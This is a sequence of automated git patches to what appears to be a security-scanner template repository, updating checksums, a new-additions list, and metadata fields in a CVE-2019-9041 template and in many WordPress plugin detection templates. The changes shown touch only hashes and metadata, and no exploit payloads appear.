+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
+http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
+http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
-http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
-http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
-http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
-http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
-http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
-http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
-http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
-http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
-http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
-http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
-http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
-http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
-http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
-http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
+http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
+http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
+http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
+http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
+http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
+http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
+http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
+http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
+http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
+http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
+http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7187,7 +7187,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:15420790694f75cf46e0fdf34d0c1601bb8517c9
+templates-checksum.txt:7d6076372386df47141d843c4f9d98a0e45e9c44
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From e81bf1c4ca46e3ec915a11d9178db58aa3bfeb7c Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 05:46:22 +0000
Subject: [PATCH 0522/1090] Auto Generated New Template Addition List [Tue Sep
 26 05:46:21 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 0eae83ea3d..20334ee2f3 100644
--- a/.new-additions
+++ b/.new-additions
@@ -6,3 +6,4 @@ http/misconfiguration/installer/alma-installer.yaml
 http/misconfiguration/installer/gibbon-installer.yaml
 http/misconfiguration/installer/mantisbt-installer.yaml
 http/misconfiguration/installer/zabbix-installer.yaml
+http/technologies/blazor-webassembly-detect.yaml

From 2e5b4b0d19226541c5883cbcf70c7004d4d2a750 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 05:46:27 +0000
Subject: [PATCH 0523/1090] Auto Generated Templates Checksum [Tue Sep 26
 05:46:27 UTC 2023] :robot:

---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 356d81a995..061da517a0 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -5543,6 +5543,7 @@ http/technologies/besu-server-detect.yaml:8c878e3909a6d98ae71741e320a5325daf3e3b
 http/technologies/bigbluebutton-detect.yaml:7babfe5c0b3525bbe6baf84260b3a52276d91ef4
 http/technologies/bigip-config-utility-detect.yaml:d09427ed818d8a6d42d55433b05f9797e8183d17
 http/technologies/bigip-detect.yaml:e732a0e0ccdf89e3a773375a381ccc826355d4d9
+http/technologies/blazor-webassembly-detect.yaml:8ca1bd033878f5e6c6c013aa8ace8f49f0a4129d
 http/technologies/burp-api-detect.yaml:32c62bae88baa39831901809a7b99a88e5e4db8a
 http/technologies/burp-collaborator-detect.yaml:c63e9a2e7b94dc5cc3cfbaf2902451e3bc8c85a5
 http/technologies/carestream-vue-detect.yaml:d38b9ca33b084e3bd3f61b383f95e9214f31ef19
@@ -7187,7 +7188,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:7d6076372386df47141d843c4f9d98a0e45e9c44
+templates-checksum.txt:9cecda08b42e6518f6e40d6b243f7e2dda1a8ba8
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From c79554fd80542b891076defb74b289b81b29a87b Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 05:47:05 +0000
Subject: [PATCH 0524/1090] TemplateMan Update [Tue Sep 26 05:47:05 UTC 2023]
 :robot:

---
 http/cves/2019/CVE-2019-9041.yaml                     | 11 +++++------
 http/technologies/wordpress/plugins/ad-inserter.yaml  |  1 +
 http/technologies/wordpress/plugins/add-to-any.yaml   |  1 +
 .../wordpress/plugins/admin-menu-editor.yaml          |  1 +
 .../wordpress/plugins/advanced-custom-fields.yaml     |  1 +
 http/technologies/wordpress/plugins/akismet.yaml      |  1 +
 .../plugins/all-404-redirect-to-homepage.yaml         |  1 +
 .../wordpress/plugins/all-in-one-seo-pack.yaml        |  1 +
 .../wordpress/plugins/all-in-one-wp-migration.yaml    |  1 +
 .../plugins/all-in-one-wp-security-and-firewall.yaml  |  1 +
 http/technologies/wordpress/plugins/amp.yaml          |  1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml |  1 +
 http/technologies/wordpress/plugins/astra-sites.yaml  |  1 +
 .../technologies/wordpress/plugins/astra-widgets.yaml |  1 +
 http/technologies/wordpress/plugins/autoptimize.yaml  |  1 +
 http/technologies/wordpress/plugins/backwpup.yaml     |  1 +
 .../wordpress/plugins/better-search-replace.yaml      |  1 +
 .../wordpress/plugins/better-wp-security.yaml         |  1 +
 .../plugins/black-studio-tinymce-widget.yaml          |  1 +
 .../wordpress/plugins/breadcrumb-navxt.yaml           |  1 +
 http/technologies/wordpress/plugins/breeze.yaml       |  1 +
 .../wordpress/plugins/broken-link-checker.yaml        |  1 +
 .../wordpress/plugins/child-theme-configurator.yaml   |  1 +
 .../wordpress/plugins/classic-editor.yaml             |  1 +
 .../wordpress/plugins/classic-widgets.yaml            |  1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml |  1 +
 http/technologies/wordpress/plugins/cmb2.yaml         |  1 +
 http/technologies/wordpress/plugins/coblocks.yaml     |  1 +
 .../technologies/wordpress/plugins/code-snippets.yaml |  1 +
 http/technologies/wordpress/plugins/coming-soon.yaml  |  1 +
 .../wordpress/plugins/complianz-gdpr.yaml             |  1 +
 .../wordpress/plugins/contact-form-7-honeypot.yaml    |  1 +
 .../wordpress/plugins/contact-form-7.yaml             |  1 +
 .../wordpress/plugins/contact-form-cfdb7.yaml         |  1 +
 .../wordpress/plugins/cookie-law-info.yaml            |  1 +
 .../technologies/wordpress/plugins/cookie-notice.yaml |  1 +
 .../wordpress/plugins/creame-whatsapp-me.yaml         |  1 +
 .../plugins/creative-mail-by-constant-contact.yaml    |  1 +
 .../technologies/wordpress/plugins/custom-css-js.yaml |  1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml |  1 +
 .../wordpress/plugins/custom-post-type-ui.yaml        |  1 +
 .../wordpress/plugins/disable-comments.yaml           |  1 +
 .../wordpress/plugins/disable-gutenberg.yaml          |  1 +
 .../wordpress/plugins/duplicate-page.yaml             |  1 +
 .../wordpress/plugins/duplicate-post.yaml             |  1 +
 http/technologies/wordpress/plugins/duplicator.yaml   |  1 +
 .../plugins/duracelltomi-google-tag-manager.yaml      |  1 +
 .../technologies/wordpress/plugins/easy-fancybox.yaml |  1 +
 .../wordpress/plugins/easy-table-of-contents.yaml     |  1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml |  1 +
 http/technologies/wordpress/plugins/elementor.yaml    |  1 +
 .../wordpress/plugins/elementskit-lite.yaml           |  1 +
 .../wordpress/plugins/enable-media-replace.yaml       |  1 +
 .../wordpress/plugins/envato-elements.yaml            |  1 +
 .../plugins/essential-addons-for-elementor-lite.yaml  |  1 +
 .../wordpress/plugins/ewww-image-optimizer.yaml       |  1 +
 .../wordpress/plugins/facebook-for-woocommerce.yaml   |  1 +
 .../wordpress/plugins/fast-indexing-api.yaml          |  1 +
 .../plugins/favicon-by-realfavicongenerator.yaml      |  1 +
 http/technologies/wordpress/plugins/flamingo.yaml     |  1 +
 http/technologies/wordpress/plugins/fluentform.yaml   |  1 +
 http/technologies/wordpress/plugins/font-awesome.yaml |  1 +
 .../plugins/force-regenerate-thumbnails.yaml          |  1 +
 http/technologies/wordpress/plugins/formidable.yaml   |  1 +
 http/technologies/wordpress/plugins/forminator.yaml   |  1 +
 .../wordpress/plugins/ga-google-analytics.yaml        |  1 +
 .../wordpress/plugins/gdpr-cookie-compliance.yaml     |  1 +
 .../plugins/google-analytics-dashboard-for-wp.yaml    |  1 +
 .../plugins/google-analytics-for-wordpress.yaml       |  1 +
 .../wordpress/plugins/google-listings-and-ads.yaml    |  1 +
 .../wordpress/plugins/google-site-kit.yaml            |  1 +
 .../wordpress/plugins/google-sitemap-generator.yaml   |  1 +
 http/technologies/wordpress/plugins/gtranslate.yaml   |  1 +
 http/technologies/wordpress/plugins/gutenberg.yaml    |  1 +
 .../wordpress/plugins/happy-elementor-addons.yaml     |  1 +
 .../wordpress/plugins/header-footer-code-manager.yaml |  1 +
 .../wordpress/plugins/header-footer-elementor.yaml    |  1 +
 .../technologies/wordpress/plugins/header-footer.yaml |  1 +
 http/technologies/wordpress/plugins/health-check.yaml |  1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml  |  1 +
 .../wordpress/plugins/host-webfonts-local.yaml        |  1 +
 http/technologies/wordpress/plugins/imagify.yaml      |  1 +
 http/technologies/wordpress/plugins/imsanity.yaml     |  1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml |  1 +
 .../wordpress/plugins/instagram-feed.yaml             |  1 +
 .../plugins/intuitive-custom-post-order.yaml          |  1 +
 http/technologies/wordpress/plugins/iwp-client.yaml   |  1 +
 .../technologies/wordpress/plugins/jetpack-boost.yaml |  1 +
 http/technologies/wordpress/plugins/jetpack.yaml      |  1 +
 .../wordpress/plugins/kadence-blocks.yaml             |  1 +
 http/technologies/wordpress/plugins/kirki.yaml        |  1 +
 http/technologies/wordpress/plugins/leadin.yaml       |  1 +
 .../plugins/limit-login-attempts-reloaded.yaml        |  1 +
 .../wordpress/plugins/limit-login-attempts.yaml       |  1 +
 .../wordpress/plugins/litespeed-cache.yaml            |  1 +
 .../wordpress/plugins/loco-translate.yaml             |  1 +
 http/technologies/wordpress/plugins/loginizer.yaml    |  1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml  |  1 +
 .../wordpress/plugins/mailchimp-for-wp.yaml           |  1 +
 http/technologies/wordpress/plugins/mailpoet.yaml     |  1 +
 http/technologies/wordpress/plugins/maintenance.yaml  |  1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml |  1 +
 .../wordpress/plugins/malcare-security.yaml           |  1 +
 http/technologies/wordpress/plugins/megamenu.yaml     |  1 +
 http/technologies/wordpress/plugins/members.yaml      |  1 +
 http/technologies/wordpress/plugins/meta-box.yaml     |  1 +
 http/technologies/wordpress/plugins/ml-slider.yaml    |  1 +
 http/technologies/wordpress/plugins/newsletter.yaml   |  1 +
 .../wordpress/plugins/nextend-facebook-connect.yaml   |  1 +
 .../wordpress/plugins/nextgen-gallery.yaml            |  1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml  |  1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml  |  1 +
 .../wordpress/plugins/official-facebook-pixel.yaml    |  1 +
 .../wordpress/plugins/one-click-demo-import.yaml      |  1 +
 http/technologies/wordpress/plugins/optinmonster.yaml |  1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml |  1 +
 .../wordpress/plugins/password-protected.yaml         |  1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml |  1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml  |  1 +
 .../technologies/wordpress/plugins/pixelyoursite.yaml |  1 +
 http/technologies/wordpress/plugins/polylang.yaml     |  1 +
 .../technologies/wordpress/plugins/popup-builder.yaml |  1 +
 http/technologies/wordpress/plugins/popup-maker.yaml  |  1 +
 http/technologies/wordpress/plugins/post-smtp.yaml    |  1 +
 .../wordpress/plugins/post-types-order.yaml           |  1 +
 .../plugins/premium-addons-for-elementor.yaml         |  1 +
 http/technologies/wordpress/plugins/pretty-link.yaml  |  1 +
 .../wordpress/plugins/really-simple-captcha.yaml      |  1 +
 .../wordpress/plugins/really-simple-ssl.yaml          |  1 +
 http/technologies/wordpress/plugins/redirection.yaml  |  1 +
 .../wordpress/plugins/redux-framework.yaml            |  1 +
 .../wordpress/plugins/regenerate-thumbnails.yaml      |  1 +
 http/technologies/wordpress/plugins/safe-svg.yaml     |  1 +
 .../wordpress/plugins/seo-by-rank-math.yaml           |  1 +
 .../technologies/wordpress/plugins/sg-cachepress.yaml |  1 +
 http/technologies/wordpress/plugins/sg-security.yaml  |  1 +
 .../wordpress/plugins/shortcodes-ultimate.yaml        |  1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml |  1 +
 .../wordpress/plugins/simple-custom-post-order.yaml   |  1 +
 http/technologies/wordpress/plugins/siteguard.yaml    |  1 +
 .../wordpress/plugins/siteorigin-panels.yaml          |  1 +
 .../wordpress/plugins/smart-slider-3.yaml             |  1 +
 .../wordpress/plugins/so-widgets-bundle.yaml          |  1 +
 .../plugins/stops-core-theme-and-plugin-updates.yaml  |  1 +
 .../wordpress/plugins/sucuri-scanner.yaml             |  1 +
 http/technologies/wordpress/plugins/svg-support.yaml  |  1 +
 .../wordpress/plugins/table-of-contents-plus.yaml     |  1 +
 http/technologies/wordpress/plugins/tablepress.yaml   |  1 +
 .../wordpress/plugins/taxonomy-terms-order.yaml       |  1 +
 .../wordpress/plugins/the-events-calendar.yaml        |  1 +
 .../wordpress/plugins/themeisle-companion.yaml        |  1 +
 .../wordpress/plugins/tinymce-advanced.yaml           |  1 +
 .../plugins/translatepress-multilingual.yaml          |  1 +
 .../plugins/ultimate-addons-for-gutenberg.yaml        |  1 +
 .../wordpress/plugins/under-construction-page.yaml    |  1 +
 http/technologies/wordpress/plugins/updraftplus.yaml  |  1 +
 http/technologies/wordpress/plugins/use-any-font.yaml |  1 +
 .../wordpress/plugins/user-role-editor.yaml           |  1 +
 .../wordpress/plugins/velvet-blues-update-urls.yaml   |  1 +
 .../wordpress/plugins/w3-total-cache.yaml             |  1 +
 .../wordpress/plugins/webp-converter-for-media.yaml   |  1 +
 http/technologies/wordpress/plugins/webp-express.yaml |  1 +
 .../wordpress/plugins/widget-importer-exporter.yaml   |  1 +
 .../plugins/woo-cart-abandonment-recovery.yaml        |  1 +
 .../plugins/woo-checkout-field-editor-pro.yaml        |  1 +
 .../wordpress/plugins/woo-variation-swatches.yaml     |  1 +
 .../woocommerce-gateway-paypal-express-checkout.yaml  |  1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml |  1 +
 .../wordpress/plugins/woocommerce-payments.yaml       |  1 +
 .../plugins/woocommerce-paypal-payments.yaml          |  1 +
 .../woocommerce-pdf-invoices-packing-slips.yaml       |  1 +
 .../wordpress/plugins/woocommerce-services.yaml       |  1 +
 http/technologies/wordpress/plugins/woocommerce.yaml  |  1 +
 http/technologies/wordpress/plugins/wordfence.yaml    |  1 +
 .../wordpress/plugins/wordpress-importer.yaml         |  1 +
 .../technologies/wordpress/plugins/wordpress-seo.yaml |  1 +
 http/technologies/wordpress/plugins/worker.yaml       |  1 +
 .../wordpress/plugins/wp-fastest-cache.yaml           |  1 +
 .../wordpress/plugins/wp-file-manager.yaml            |  1 +
 .../wordpress/plugins/wp-google-maps.yaml             |  1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml |  1 +
 .../wordpress/plugins/wp-maintenance-mode.yaml        |  1 +
 .../technologies/wordpress/plugins/wp-migrate-db.yaml |  1 +
 .../wordpress/plugins/wp-multibyte-patch.yaml         |  1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml  |  1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml  |  1 +
 http/technologies/wordpress/plugins/wp-reset.yaml     |  1 +
 .../plugins/wp-reviews-plugin-for-google.yaml         |  1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml  |  1 +
 http/technologies/wordpress/plugins/wp-seopress.yaml  |  1 +
 .../wordpress/plugins/wp-sitemap-page.yaml            |  1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml   |  1 +
 .../technologies/wordpress/plugins/wp-statistics.yaml |  1 +
 .../wordpress/plugins/wp-super-cache.yaml             |  1 +
 .../wordpress/plugins/wp-user-avatar.yaml             |  1 +
 .../wordpress/plugins/wpcf7-recaptcha.yaml            |  1 +
 .../wordpress/plugins/wpcf7-redirect.yaml             |  1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml |  1 +
 .../wordpress/plugins/wps-hide-login.yaml             |  1 +
 .../wordpress/plugins/wpvivid-backuprestore.yaml      |  1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml  |  1 +
 201 files changed, 205 insertions(+), 6 deletions(-)

diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml
index d39d0bb241..9ff4d664af 100644
--- a/http/cves/2019/CVE-2019-9041.yaml
+++ b/http/cves/2019/CVE-2019-9041.yaml
@@ -5,24 +5,23 @@ info:
   author: pikpikcu
   severity: high
   description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.
-  remediation: |
-    Apply the latest security patch or upgrade to a newer version of ZZZCMS.
   reference:
     - https://www.exploit-db.com/exploits/46454/
     - http://www.iwantacve.cn/index.php/archives/118/
     - https://nvd.nist.gov/vuln/detail/CVE-2019-9041
+  remediation: |
+    Apply the latest security patch or upgrade to a newer version of ZZZCMS.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.2
     cve-id: CVE-2019-9041
     cwe-id: CWE-917
-    epss-score: 0.01127
-    epss-percentile: 0.82839
     cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:*
+    epss-score: 0.01127
   metadata:
-    max-request: 1
-    vendor: zzzcms
+    max-request: 2
     product: zzzphp
+    vendor: zzzcms
   tags: cve,cve2019,zzzcms,rce,edb
 
 http:
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
